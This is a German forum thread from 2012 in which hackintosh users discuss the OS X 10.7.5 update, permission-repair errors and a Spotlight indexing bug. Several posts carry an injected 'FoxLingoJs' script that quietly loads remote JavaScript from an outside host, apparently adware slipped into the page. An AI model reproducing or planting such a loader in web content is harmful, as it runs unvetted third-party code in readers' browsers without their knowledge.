Zum Inhalt wechseln

Foto
- - - - -

10.7.5 ist draussen ! Eure Erfahrungen


  • Bitte melde dich an um zu Antworten
36 Antworten in diesem Thema

#1 OFFLINE   AkimoA

AkimoA

  • Administrators
  • 3.930 Beiträge
  • LocationBlack Forest
  • OSX:10.14
  • Motherboard: GA-B360M-DS3H
  • CPU: Intel® Core™ i5-8600
  • Grafikkarte: AMD RX 580 8192MB GDDR5

Geschrieben 19 September 2012 - 18:48 Uhr

The 10.7.5 update is recommended for all OS X Lion users and includes general operating system fixes that improve the stability, compatibility and security of your Mac. It also includes Gatekeeper, a new security feature that helps you keep your Mac safe from malicious software by giving you more control over what apps are installed on your Mac.


The 10.7.5 update also includes fixes that:

  • Resolve an issue where icons in Launchpad may get rearranged after a restart
  • Improve Wi-Fi reliability for iMac (Late 2009 and newer)
  • Resolve an issue using Spotlight to search an SMB server
  • Improve compatibility connecting to Active Directory servers
For detailed information on this update, please visit this website: http://support.apple.com/kb/DL1582.


Edit: DL link hinzugefügt


:dev:

Have fun !

Bearbeitet von AkimoA, 20 September 2012 - 06:13 Uhr.

  • lord_webi und OlliF gefällt das

#2 Guest_Stefe Hobs_*

Guest_Stefe Hobs_*
  • Guests

Geschrieben 19 September 2012 - 18:59 Uhr

thx für die info bro :akimoa: .... bin schon am saugen :staubsaug:

#3 OFFLINE   blackLion

blackLion

    ./Club86

  • Members
  • 54 Beiträge

Geschrieben 19 September 2012 - 21:03 Uhr

wenn ich auf denn link click kommt We're sorry.

We can't find the article you're looking for. :opa:

und wenn ich auf update gehe kommt auch nichts von 10.7.5
Lion 10.8.2
MoBo P8H61-M LX
cpu intel G540
RAM 16GB
nVidia GeForce 210 1GB
120GB SSD
40GB Sata
160GB Sata
[SIGPIC][/SIGPIC]

#4 OFFLINE   AkimoA

AkimoA

  • Administrators
  • 3.930 Beiträge
  • LocationBlack Forest
  • OSX:10.14
  • Motherboard: GA-B360M-DS3H
  • CPU: Intel® Core™ i5-8600
  • Grafikkarte: AMD RX 580 8192MB GDDR5

Geschrieben 19 September 2012 - 21:05 Uhr

intressant selbes nummer beim link aber im Update hab ichs !!! hmm ma abwarten :editor1:

#5 Guest_Stefe Hobs_*

Guest_Stefe Hobs_*
  • Guests

Geschrieben 19 September 2012 - 21:40 Uhr

bei mir läuft dat update ... dauert nur bisschen lange - da server am ende - denke daher wirst du zur zeit einfach "abgewimmelt" .... sollte sich im laufe der nächsten stunden aber legen :wink:

apple braucht zeitweise einfach mehr server-power ...

#6 OFFLINE   blackLion

blackLion

    ./Club86

  • Members
  • 54 Beiträge

Geschrieben 19 September 2012 - 23:47 Uhr

habs jetzt auch gefunden werde es aber erst morgen früh laden wenn ich mein dsl anschluß hab weil über mein stick würde es 2 tage dauern
Lion 10.8.2
MoBo P8H61-M LX
cpu intel G540
RAM 16GB
nVidia GeForce 210 1GB
120GB SSD
40GB Sata
160GB Sata
[SIGPIC][/SIGPIC]

#7 OFFLINE   OlliF

OlliF

    ./Club86

  • Members
  • 93 Beiträge

Geschrieben 20 September 2012 - 11:54 Uhr

Also ich habe es eben installiert, 1,25 Gb über Softwareaktualisierung.
Bisher konnte ich keine Probleme feststellen, lediglich TRIM musste ich wieder aktivieren.
  • AkimoA gefällt das
Gruß Olli

iMac G4 17" (Late 2003) 1,25 GHz | 2GB RAM | 500GB HDD | APE+BT | 10.4.11 - 10.5.8

 PowerMac G5 (Late 2005) 970MP 2x2,0 GHz | 4Gb RAM | 750Gb HDD |
GeForce 7800GT | OSX 10.5.8


Hackintosh: Mountain Lion 10.8.3
I7 2600K | 16GB Corsair DDR3 | Asus GTX 680 DirectCU II OC |
ASUS XONAR DX | Crucial m4 256Gb SSD| Intel 320 120Gb SSD | Gigabyte Z68XP-UD4 |
Wireless Keyboard | Magic Trackpad

 Macbook Pro 15" (Late 2006): Lion 10.7.5
C2D 2,16 GHz | 3 GB RAM | 64 GB Adata 599 SSD | Radeon X1600
 Macbook Pro 17" (Late 2011): Mountain Lion 10.8.3 + Boot Camp: Win 7
I7 2,40 GHz | 16 GB RAM | 512 GB Crucial M4 SSD | Radeon HD 6770M

 iPad 2 Wifi+3G | 64Gb  iPhone 4 | 16GB



<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

#8 Guest_Stefe Hobs_*

Guest_Stefe Hobs_*
  • Guests

Geschrieben 20 September 2012 - 14:17 Uhr

applehda.kext wieder ersetzt, sonst alles tutti :aura:

#9 OFFLINE   OlliF

OlliF

    ./Club86

  • Members
  • 93 Beiträge

Geschrieben 20 September 2012 - 14:23 Uhr

Hmmm, war wohl doch nicht so problemlos...

Volume „Lion HD“ überprüfen
Dateisystem prüfenLive-Verifizierung durchführen.
HFS+ Volume (Journaled) überprüfen.
Zusatzdatei für Dateiaufbau wird überprüft.
Katalog wird überprüft.
Multi-Link-Dateien werden überprüft.
Kataloghierarchie wird überprüft.
Datei für erweiterte Attribute wird überprüft.
Volume-Bitmap wird überprüft.
Informationen des Volumes werden überprüft.
Das Volume „Lion HD“ ist anscheinend in Ordnung.

Zugriffsrechte für „Lion HD“ überprüfen
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/Dutch.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/French.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/German.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/Italian.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/Japanese.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/da.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/fi.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/hr.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/ko.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/no.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/pl.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/pt.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/pt_PT.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/ru.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/sk.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/sv.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/zh_CN.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/.Displays/V1/Displays.prefPane/Contents/Resources/zh_TW.lproj/DisplaysPref.nib“, Soll-Wert: -rw-r--r-- , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane“, Soll-Wert: drwxr-xr-x , Ist-Wert: lrwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/CoreServices/Menu Extras/Displays.menu“, Soll-Wert: drwxr-xr-x , Ist-Wert: lrwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/MonitorPanels/Arrange.monitorPanel“, Soll-Wert: drwxr-xr-x , Ist-Wert: lrwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/MonitorPanels/Display.monitorPanel“, Soll-Wert: drwxr-xr-x , Ist-Wert: lrwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/MonitorPanels/Profile.monitorPanel“, Soll-Wert: drwxr-xr-x , Ist-Wert: lrwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/hr.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/sk.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/pl.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/pt_PT.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/zh_TW.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/zh_CN.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/pt.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/sv.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/ru.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/no.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/ko.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/fi.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/da.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/Dutch.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/Italian.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/French.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/German.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
Abweichende Zugriffsrechte für „System/Library/PreferencePanes/Displays.prefPane/Contents/Resources/Japanese.lproj/DisplaysPref.nib“, Soll-Wert: drwxr-xr-x , Ist-Wert: -rwxr-xr-x .
ACL wurde gefunden, aber nicht erwartet auf „private/var/root“
ACL wurde gefunden, aber nicht erwartet auf „private/var/root/Library“
ACL wurde gefunden, aber nicht erwartet auf „private/var/root/Library/Preferences“

Überprüfung der Zugriffsrechte abgeschlossen

lässt sich auch nicht reparieren.
Die ACL Fehler waren übrigens schon vorher vorhanden und haben mich nicht weiter gestört.
Gruß Olli

iMac G4 17" (Late 2003) 1,25 GHz | 2GB RAM | 500GB HDD | APE+BT | 10.4.11 - 10.5.8

 PowerMac G5 (Late 2005) 970MP 2x2,0 GHz | 4Gb RAM | 750Gb HDD |
GeForce 7800GT | OSX 10.5.8


Hackintosh: Mountain Lion 10.8.3
I7 2600K | 16GB Corsair DDR3 | Asus GTX 680 DirectCU II OC |
ASUS XONAR DX | Crucial m4 256Gb SSD| Intel 320 120Gb SSD | Gigabyte Z68XP-UD4 |
Wireless Keyboard | Magic Trackpad

 Macbook Pro 15" (Late 2006): Lion 10.7.5
C2D 2,16 GHz | 3 GB RAM | 64 GB Adata 599 SSD | Radeon X1600
 Macbook Pro 17" (Late 2011): Mountain Lion 10.8.3 + Boot Camp: Win 7
I7 2,40 GHz | 16 GB RAM | 512 GB Crucial M4 SSD | Radeon HD 6770M

 iPad 2 Wifi+3G | 64Gb  iPhone 4 | 16GB



<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

#10 Guest_Stefe Hobs_*

Guest_Stefe Hobs_*
  • Guests

Geschrieben 20 September 2012 - 15:05 Uhr

hab ich ebenfalls ... ich denke diese fehler sind nicht weiter schlimm. ich hänge mal noch die applesmc.kext aus 10.7.3 mit an - für die leute die sich an der smc fehlermeldung stören (konsole ---> sudo -s ----> dmesg).

Angehängte Dateien


Bearbeitet von Stefe Hobs, 20 September 2012 - 15:12 Uhr.


#11 OFFLINE   lord_webi

lord_webi

    MOS-6502

  • Administrators
  • 9.662 Beiträge
  • LocationHIT ANY KEY TO BEGIN
  • OSX:10.10
  • Motherboard: Asus X99-A
  • CPU: i7-5930K@3,5GHz
  • Grafikkarte: GTX 970 4GB
Zeige Hardware
1 Hardware Favorit(en)

Geschrieben 20 September 2012 - 15:15 Uhr

och, diese Meldungen habe ich bei allen Hackis schon immer gehabt ... würde ich mir keine Gedanken drum machen :ggg:

My Silent Hacki's:

 

macOS Sierra 10.12.2

GA-P55A-UD3 - i5 760@2.93GHz - 16GB DDR3 RAM - Zotac Zone GTX 750 TI 2GB passiv - 480GB SSD - 2x 250GB HDD - 1x 512GB HDD

Apple KeyBoard - Creative SoundBlaster Omni Surround 5.1 USB - Logitech Z-5300 5.1 THX

 

Yosemite 10.10.5

Asus X99-A - i7-5930K @ 3.5GHz - 16 GB DDR4-2133 Kingston HyperX Fury - Asus STRIX - GTX 970 4 GB silent

4x Samsung SSD - 16x LG BD Brenner

 

Bootloader: :cloverli:


#12 OFFLINE   OlliF

OlliF

    ./Club86

  • Members
  • 93 Beiträge

Geschrieben 20 September 2012 - 16:08 Uhr

Bis Lion 10.7.3 war alles ohne Fehler, nach 10.7.4 dann der ACL- Fehler und nun mit dem 10.7.5 update eben der Rest.
Nun ja, eigenartig fand ich das schon, aber wenn's nicht so wild ist - C'est la vie ... :ruelps:


EDIT: Die gleichen Fehler kommen auch bei meinem Macbook Pro Late 2006.
Daher ist davon auszugehen, das es wahrscheinlich am 10.7.5 Update selbst liegen muss.

Bearbeitet von OlliF, 20 September 2012 - 19:55 Uhr.
neue Erkenntnisse ;-)

Gruß Olli

iMac G4 17" (Late 2003) 1,25 GHz | 2GB RAM | 500GB HDD | APE+BT | 10.4.11 - 10.5.8

 PowerMac G5 (Late 2005) 970MP 2x2,0 GHz | 4Gb RAM | 750Gb HDD |
GeForce 7800GT | OSX 10.5.8


Hackintosh: Mountain Lion 10.8.3
I7 2600K | 16GB Corsair DDR3 | Asus GTX 680 DirectCU II OC |
ASUS XONAR DX | Crucial m4 256Gb SSD| Intel 320 120Gb SSD | Gigabyte Z68XP-UD4 |
Wireless Keyboard | Magic Trackpad

 Macbook Pro 15" (Late 2006): Lion 10.7.5
C2D 2,16 GHz | 3 GB RAM | 64 GB Adata 599 SSD | Radeon X1600
 Macbook Pro 17" (Late 2011): Mountain Lion 10.8.3 + Boot Camp: Win 7
I7 2,40 GHz | 16 GB RAM | 512 GB Crucial M4 SSD | Radeon HD 6770M

 iPad 2 Wifi+3G | 64Gb  iPhone 4 | 16GB



<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

#13 Guest_Stefe Hobs_*

Guest_Stefe Hobs_*
  • Guests

Geschrieben 21 September 2012 - 12:22 Uhr

edit: thema verschoben ;)

edit2: bug nr.1: nach dem update per softwareaktualisierung hat spotlight probleme beim neu indizieren der laufwerke. das problem tritt erst auf, wenn spotlight dazu veranlasst wird einen neuen index zu generieren. die zeitangeben schwanken zwischen stunden und tagen - führen aber selbst nach 12h dauerlauf nicht zum abschluß. der fehler tritt unabhängig auf allen meinen hackis auf, die das update auf 10.7.5 per softwareaktualisierung bekommen haben :heul:

*man beachte die uhrzeit während dem jeweiligen screenshot und die zeitangabe von spotlight* .... unter 10.7.4 dauerte das komplette neu indizieren ca. 25min :(

hier kann man getrost sagen: apple, setzen 6!

edit3: combo-update laden und nochmals drüber installieren bringt nichts - dauert noch immer mehrere stunden/tage/wochen/monate ... ja vermutlich sogar jahre oder jahrzehnte .... jahrhunderte .... *grrrrrrr* kein ahnung was apple denkt an spotlight verbessert zu haben - für mich ist das einfach nur murks.

verdammter murks ..... aarrghhh :dev:

Angehängte Dateien


Bearbeitet von Stefe Hobs, 21 September 2012 - 15:01 Uhr.


#14 OFFLINE   OlliF

OlliF

    ./Club86

  • Members
  • 93 Beiträge

Geschrieben 21 September 2012 - 14:05 Uhr

Preisfrage: Sind dadurch die Fehler bei den Zugriffsrechten eventuell auch verschwunden? :)
Gruß Olli

iMac G4 17" (Late 2003) 1,25 GHz | 2GB RAM | 500GB HDD | APE+BT | 10.4.11 - 10.5.8

 PowerMac G5 (Late 2005) 970MP 2x2,0 GHz | 4Gb RAM | 750Gb HDD |
GeForce 7800GT | OSX 10.5.8


Hackintosh: Mountain Lion 10.8.3
I7 2600K | 16GB Corsair DDR3 | Asus GTX 680 DirectCU II OC |
ASUS XONAR DX | Crucial m4 256Gb SSD| Intel 320 120Gb SSD | Gigabyte Z68XP-UD4 |
Wireless Keyboard | Magic Trackpad

 Macbook Pro 15" (Late 2006): Lion 10.7.5
C2D 2,16 GHz | 3 GB RAM | 64 GB Adata 599 SSD | Radeon X1600
 Macbook Pro 17" (Late 2011): Mountain Lion 10.8.3 + Boot Camp: Win 7
I7 2,40 GHz | 16 GB RAM | 512 GB Crucial M4 SSD | Radeon HD 6770M

 iPad 2 Wifi+3G | 64Gb  iPhone 4 | 16GB



<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

#15 Guest_Stefe Hobs_*

Guest_Stefe Hobs_*
  • Guests

Geschrieben 21 September 2012 - 14:07 Uhr

leider nicht, nein :(

bin gespannt obs diesen bug auch unter ML gibt, würde mich jedenfalls nicht weiter wundern :dev:

Bearbeitet von Stefe Hobs, 21 September 2012 - 14:14 Uhr.


#16 OFFLINE   OlliF

OlliF

    ./Club86

  • Members
  • 93 Beiträge

Geschrieben 21 September 2012 - 14:14 Uhr

Schaaade, wär ja auch zu einfach gewesen...
und nein, unter ML ist alles Chic. Zumindest bei meinem Macbook.
Gruß Olli

iMac G4 17" (Late 2003) 1,25 GHz | 2GB RAM | 500GB HDD | APE+BT | 10.4.11 - 10.5.8

 PowerMac G5 (Late 2005) 970MP 2x2,0 GHz | 4Gb RAM | 750Gb HDD |
GeForce 7800GT | OSX 10.5.8


Hackintosh: Mountain Lion 10.8.3
I7 2600K | 16GB Corsair DDR3 | Asus GTX 680 DirectCU II OC |
ASUS XONAR DX | Crucial m4 256Gb SSD| Intel 320 120Gb SSD | Gigabyte Z68XP-UD4 |
Wireless Keyboard | Magic Trackpad

 Macbook Pro 15" (Late 2006): Lion 10.7.5
C2D 2,16 GHz | 3 GB RAM | 64 GB Adata 599 SSD | Radeon X1600
 Macbook Pro 17" (Late 2011): Mountain Lion 10.8.3 + Boot Camp: Win 7
I7 2,40 GHz | 16 GB RAM | 512 GB Crucial M4 SSD | Radeon HD 6770M

 iPad 2 Wifi+3G | 64Gb  iPhone 4 | 16GB



<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

#17 Guest_Stefe Hobs_*

Guest_Stefe Hobs_*
  • Guests

Geschrieben 21 September 2012 - 15:06 Uhr

hast du schon eine inizierung deiner laufwerke angestoßen? von alleine passiert das nämlich nicht und kann somit schlecht bemerkt werden. ich vermute nämlich es gibt dann ne überraschung ... die meisten merken das vermutlich iwann später mal :D

edit: hier unter 10.8.2 hab ich auch das problem. das wird noch ne richtige seuche .... :witzbold:

Bearbeitet von Stefe Hobs, 21 September 2012 - 15:33 Uhr.


#18 OFFLINE   OlliF

OlliF

    ./Club86

  • Members
  • 93 Beiträge

Geschrieben 21 September 2012 - 15:49 Uhr

Nein, habe ich noch nicht. Ich dachte du meinst die Fehler bei den Zugriffsrechten.
Ich Teste jetzt mal die Indizierung vom Hacki und ich werde latürnich berichten. :)
Allerdings sehe ich jetzt schon, das der Prozess nicht so richtig in die Gänge kommt.


Gesendet von meinem iPad mit Tapatalk HD
Gruß Olli

iMac G4 17" (Late 2003) 1,25 GHz | 2GB RAM | 500GB HDD | APE+BT | 10.4.11 - 10.5.8

 PowerMac G5 (Late 2005) 970MP 2x2,0 GHz | 4Gb RAM | 750Gb HDD |
GeForce 7800GT | OSX 10.5.8


Hackintosh: Mountain Lion 10.8.3
I7 2600K | 16GB Corsair DDR3 | Asus GTX 680 DirectCU II OC |
ASUS XONAR DX | Crucial m4 256Gb SSD| Intel 320 120Gb SSD | Gigabyte Z68XP-UD4 |
Wireless Keyboard | Magic Trackpad

 Macbook Pro 15" (Late 2006): Lion 10.7.5
C2D 2,16 GHz | 3 GB RAM | 64 GB Adata 599 SSD | Radeon X1600
 Macbook Pro 17" (Late 2011): Mountain Lion 10.8.3 + Boot Camp: Win 7
I7 2,40 GHz | 16 GB RAM | 512 GB Crucial M4 SSD | Radeon HD 6770M

 iPad 2 Wifi+3G | 64Gb  iPhone 4 | 16GB



<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

#19 OFFLINE   Eagle

Eagle

    ./Club86

  • Hack-Inc-Friends
  • 1.261 Beiträge
  • OSX:10.13
  • Motherboard: H55N-USB3
  • CPU: i5 750
  • Grafikkarte: AMD HD7770

Geschrieben 21 September 2012 - 15:49 Uhr

Wie Notwendig ist es denn die Laufwerke neu indizieren zu lassen? Ich mein jetzt wo ich es weiss werd ichs eh nicht starten..


MainSystem HackMini OS X 10.9.3 | Gigabyte GA-H55N-USB3 ITX | Intel Core i5 750 | PNY 8GB DDR3 1333MHz RAM | ATI/AMD ASUS HD7770 DC 1024MB Graphics | Samsung 830 Series 128GB SSD | Realtek RTL8111E LAN | Bluetooth 4.0 BCM20702 | Apple Wireless Keyboard




HackPro OS X 10.9.3 | ASRock AOD790GX/128M | AMD Phenom II X4 B50 | 5GB DDR2 800MHz RAM | ATI/AMD HIS Radeon HD6450 1024MB Passive Graphics | Samsung 830 Series SSD | Realtek RTL8111C-VCO-GR LAN | Apple Magic Mouse & Wireless Keyboard


#20 Guest_Stefe Hobs_*

Guest_Stefe Hobs_*
  • Guests

Geschrieben 21 September 2012 - 15:55 Uhr

ich finde das sehr wichtig - zumindest bei meiner arbeitsweise - da ich so gut wie alles über spotlight mache. deswegen ärgert es mich eben besonders, da spotlight während dem indizieren spärliche ergebnisse liefert.

Allerdings sehe ich jetzt schon, das der Prozess nicht so richtig in die Gänge kommt.

jau, schlafende hunde eben. ich denke darüber werden sich noch einige in zukunft wundern ;)

edit: auf meinem MBA hab ich das problem jedenfalls auch.

Bearbeitet von Stefe Hobs, 21 September 2012 - 16:10 Uhr.





Aktive Besucher in diesem Forum: 1

Mitglieder: 0, Gäste: 1, unsichtbare Mitglieder: 0